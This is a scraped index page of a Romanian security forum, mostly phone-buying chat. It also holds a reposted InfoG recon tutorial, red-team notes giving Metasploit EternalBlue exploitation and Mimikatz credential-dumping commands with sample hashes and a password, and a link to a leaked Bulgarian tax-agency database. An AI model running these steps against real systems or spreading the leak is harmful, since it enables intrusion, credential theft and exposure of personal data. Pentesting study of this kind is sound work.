Jump to content
  1. Informatii generale

    1. Anunturi importante

      Anunturile importante si regulile forumului. Cititi regulamentu​l inainte de a posta.

    2. Bine ai venit

      Bine ati venit pe forumul Romanian Security Team, aici va puteti prezenta (optional)

    3. Proiecte RST

      Aici veti putea gasi toate programele, tutorialele, metodele si exploiturile create de catre membrii RST

  2. Sectiunea tehnica

    1. Exploituri

      Cele mai noi exploituri, POC-uri sau shellcode-uri

    2. Challenges

      Challenge-uri - Wargames, pentru amatorii CTF-urilor

    3. Bug Bounty

      Categorie destinata discutiilor referitoare la site-urile care au un program Bug Bounty in desfasurare prin care rasplatesc persoanele care le raporteaza vulnerabilitati

    4. Programare

      Coltul programatorilor: C/C++, Visual Basic, .NET, Java, ASM, Shell scripting, Perl, Python

    5. Reverse engineering & exploit development

      Tutoriale despre analiza malware, sample-uri, cod sursa, programe utile, reverse engineering si exploit development

    6. Mobile phones

      Discutii despre telefoane mobile, root-ing, jailbreak-ing etc.

    7. Sisteme de operare si discutii hardware

      Discutii in materie hardware, windows, unix, bsd etc.

    8. Electronica

      Discutii generale despre electronica

    9. Wireless Pentesting

      Wardriving area, WiFi, Bluetooth si GSM hacking

    10. Black SEO & monetizare

      Tips & tricks, questions, monetizare

  3. Programe

    1. Programe hacking

      Postati aici utilitare cum ar fi sniffere, bruteforcers, fuzzers etc. Nu faceti cereri aici.

    2. Programe securitate

      Postati aici programe cum ar fi firewall-uri, antivirusi si programe similare

    3. Programe utile

      Programe ce nu se incadreaza in celelalte sectiuni: hack sau securitate

    4. Free stuff

      Diverse lucruri utile, fiind excluse root-uri, SMTP-uri, VPS-uri etc.

  4. Discutii generale

    1. RST Market

      Orice vanzare/cumparare care are legatura cu frauda online/bancara sau access neautorizat este penalizata cu ban permanent!  Minim 50 de posturi pentru acces!

    2. Off-topic

      Discutii pe diverse teme, discutii care nu se incadreaza la celalalte categorii. Doar discutii din domeniul IT!

    3. Discutii incepatori

      Daca esti incepator, ai o intrebare simpla sau vrei sa stii mai multe despre un domeniu, aici e sectiunea potrivita

    4. Stiri securitate

      Stiri din domeniul securitatii IT

    5. Sugestii

      Vreti un forum mai bun? Orice sugestie din partea voastra va fi analizata. Doar sugestii pentru site/forum.

    6. Linkuri

      Postati aici doar linkurile despre securitate!

    7. Cosul de gunoi

      Toate topicurile care au deviat de la raspuns vor fi mutate aici.

  • Topics

  • Posts

    • InfoG is a Shellscript used to gather information about a target. It allows the ethical hacker to gather information during the initial phases of a penetration test. The tool has many features. Some are as follows: Check Website info Check Phone info IP Tracker Check Valid E-mail Check if site is Up/Down Check internet speed Check Personal info Find IP behind Cloudflare Find Subdomains Port Scan (Multi-threaded) Check CMS Check DNS leaking Let’s Get Started! First, we need to install the tool by typing the following command: git clone https://github.com/thelinuxchoice/infog Then we change directory to infog by typing the following command: cd infog Now, we want to see the content of the directory, so we type the following command: ls Your screen should look like that: Then we run the tool by typing the following command: bash infog.sh The tool will start, and your screen should look like that: Then, we have a look at the options that are offered by the tool. You can choose any option of your choice. As a first test, we are going to check whether the website is up or down. So we type: 5 The tool will prompt us to enter the target website. You can type any website of your choice (where you are authorized to do so). In our case, we type: www.certifiedhacker.com The tool will run the test and will return the results. Your screen should look like that: The remote host is up. As shown in the above screen shot, the tool printed Site is Up ! Let’s try another test Now, we want to check the open ports of a given website. Again, we type: bash infog.sh then we select option 12 by typing: 12 After selecting the option, the tool will prompt us to enter the host. So we enter the following: www.certifiedhacker.com The tool will ask us if we want to scan a single port or a port range. We select port range, by typing the following: 2 Then, the tool will prompt us to enter the range of the ports that we would like to scan. In our case, we want to scan from port number 1 to 1000. So we type: 1-1000 Then the tool prompts us to enter the number of threads. The tool’s default is 10. So we keep it at 10 by typing the following: 10 If you successfully managed to follow the steps, your screen should look like that: Then our scan will start. And your screen should look like the following screenshots: In the above screenshots, the tool is scanning different ports, and it is flagging out the open ones as the scan progresses. At the end of the scan, the tool will give us a summary of the discovered open ports. In our case, the scanner printed the following: There are many other features and options to explore within this tool. Sursa: https://latesthackingnews.com/2019/05/13/infog-v1-0-an-open-source-information-gathering-tool/
    • A Red-Teamer diaries This is publicly accessible personal notes about my pentesting/red teaming experiments in a controlled environment that involve playing with various tools and techniques used by penetration testers, red teams and advanced adversaries. Project in progress Intrusion Kill Chain Mapping the Network RunFinger.py Gather information about the Domain name and windows machine running in the network bash$ cd /usr/share/Responder/tools bash$ sudo python RunFinger.py -i or bash$ responder-RunFinger Nbtscan Scanning IP networks for NetBIOS name information. bash$ sudo nbtscan -v -s : Crackmapexec v 4.0 Scan the network range based on the SMB information bash$ cme smb Nmap scan Scan all the machine network and save the outputs . -oA options : Means output with all format -T4 : Fast scan Fast Scan bash$ nmap -p 1-65535 -sV -sS -T4 -oA output target_IP Intensive Scan (Note recommended): bash$ nmap -p 1-65535 -Pn -A -oA output target_IP Scan with enumeration of the running services version : -sC : Safe Scan -sV : Get the service version bash$ nmap -sC -sV -oA output target Angry IP scanner Download the tool from this link : Angry IP Scanner Change the preferences settings Lateral Movement and Exploiting Scanning for EternalBlue ms17-010 bash$ nmap -p445 --script smb-vuln-ms17-010 <target>/24 If the target is vulnrable the output is as following Script Output Host script results: | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ Exploiting Eternal Blue - Metasploit Module (Windows 7 x64 only ) Note : The default Module supported by Metasploit is exploiting only windows 7 x64 bit Otherwise the target will be crashed . msf > use exploit/windows/smb/ms17_010_eternalblue msf exploit(ms17_010_eternalblue) > show targets ...targets... msf exploit(ms17_010_eternalblue) > set TARGET <target-id> msf exploit(ms17_010_eternalblue) > show options ...show and set options... msf exploit(ms17_010_eternalblue) > exploit Mimikatz - Metasploit After obtaining a meterpreter shell, we need to ensure that our session is running with SYSTEM level privileges for Mimikatz to function properly. meterpreter > getuid Server username: WINXP-E95CE571A1\Administrator meterpreter > getsystem ...got system (via technique 1). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM Reading Hashes and Passwords from Memory meterpreter > load mimikatz Loading extension mimikatz...success. meterpreter > msv [+] Running as SYSTEM [*] Retrieving msv credentials msv credentials =============== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;78980 NTLM WINXP-E95CE571A1 Administrator lm{ 00000000000000000000000000000000 }, ntlm{ d6eec67681a3be111b5605849505628f } 0;996 Negotiate NT AUTHORITY NETWORK SERVICE lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 } 0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO) 0;56683 NTLM n.s. (Credentials KO) 0;999 NTLM WORKGROUP WINXP-E95CE571A1$ n.s. (Credentials KO) meterpreter > kerberos [+] Running as SYSTEM [*] Retrieving kerberos credentials kerberos credentials ==================== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;999 NTLM WORKGROUP WINXP-E95CE571A1$ 0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;56683 NTLM 0;996 Negotiate NT AUTHORITY NETWORK SERVICE 0;78980 NTLM WINXP-E95CE571A1 Administrator SuperSecretPassword meterpreter > mimikatz_command -f sekurlsa::searchPasswords [0] { Administrator ; WINXP-E95CE571A1 ; SuperSecretPassword } meterpreter > mimikatz_command -f sekurlsa::logonpasswords And many more... enjoy   Download Link : https://github.com/ihebski/A-Red-Teamer-diaries?fbclid=IwAR2QfukPc5Eev-jwMpX28e4s6tOQ4uHYGkTRWdClv2ZQVHEqT8g7BksjSMI
    • https://raidforums.com/Thread-Bulgarian-NRA-НАП-nap-bg-Database-Leaked-Download
    • Daca vrei sa ramai in ecosistemul Android cat si cel Samsung, si vrei sa faci si o oarecare economie, S10e e o alegere foarte buna, o sa vezi ca OneUI e mult mai bun decat Samsung Experience. Avand in vedere ca ai si mainile mai mici, eu zic ca S10e se potriveste si pentru ergonomie.   Daca vrei sa incerci ceva diferit, sa iei Apple, nu are rost sa iti iei generatie veche. Iar avand in vedere ca XR are ecran 720p, sa fim seriosi, mai bine iei S10e. Daca XR avea ecran 1080p era o varianta de luat in seama, dar daca nu au fost in stare sa respecte una dintre cele mai importante chestii pe care pana si telefoane de 500 de lei o respecta, minim rezolutie FHD in 2019, nu merita sa vanda, sincer. Daca iti permiti sa te intinzi, un XS ar fi bun.
    • Sursa: http://www.d1g1r3v.net/madskillz Ati mai gasit si alte sursa?
    • Voiam intr-un timp sa intru pe seria iPhone dar e nu e aceeasi chestie. Nu poti face la fel de multe lucruri ca pe un Android indiferent de ce telefon ai.  Nu te mai lua dupa toti youtuberii si toate cacaturile auzite de pe net. Poti merge intr-un magazin sa incerci telefoane la rand si cel care iti place il iei. Eu cand mi-am cumparat Note am facut-o fara a ma uita daca are defecte si chestii pe care unii le scot in fata. Mergi pe ce iti place cel mai mult.  Din partea mea iti recomand un S10 si ai sa vezi ca filmarile lui doar o camera le intrece.
    • eu am mana mica tocmai de asta am luat in calcul s10e/s10 simplu
    • Pentru filmari 4k si poze e cel mai potrivit S10/+  Eu am Note9 si inca-s multumit de pozele si filmarile pe care le scoate, mai ales bateria. Mi se pare seria Note mult mai avansata decat S. Ti-as recomanda unul dar sunt mari, parerea mea. Eu am palma foarte mare si imi permite sa il tin lejer in mana si sa pot scrie in acelasi timp.    
    • Salut, detin un Samsung s7 edge si a inceput sa mearga cam greu si  am decis sa il schimb. 1. Sa cumpar s10e sau s10 (plus mi se pare prea mare si inutil) 2. Sa trec la iPhone, insa bugetul imi permite maxim 8 plus (desi in reviewuri am observat ca si 7 plus e aproape identic schimbarile fiind nesemnificative) Voi ce recomandati din experienta voastra nu din auzite ca nu imi este util, deoarece si eu am tot citit reviewuri. Mentionez si ca vreau un telefon care sa ma tina 1 an jumate cel putin, nu ca dupa cateva luni sa il schimb ca merge greu (ceea ce am observant ca se plang multi cu iPhone ca dupa upgrade in loc sa mearga mai bine merge tot mai greu)   Ce fac eu cu telefonul? - facebook, WhatsApp, Instagram, skype, browsing zilnic deci sa nu moara bateria dupa 4 ore -am nevoie si de camera sa scoata pozele ok si sa pot filma cu el - legat de bateria la acest capitol nu-mi pasa ca daca trebuie sa fac poze/filmez am bateria externa cu mine
    • Ala cred e fratele vostru de aici :))) kfollow si celalalte 20 de nicknames
  • Create New...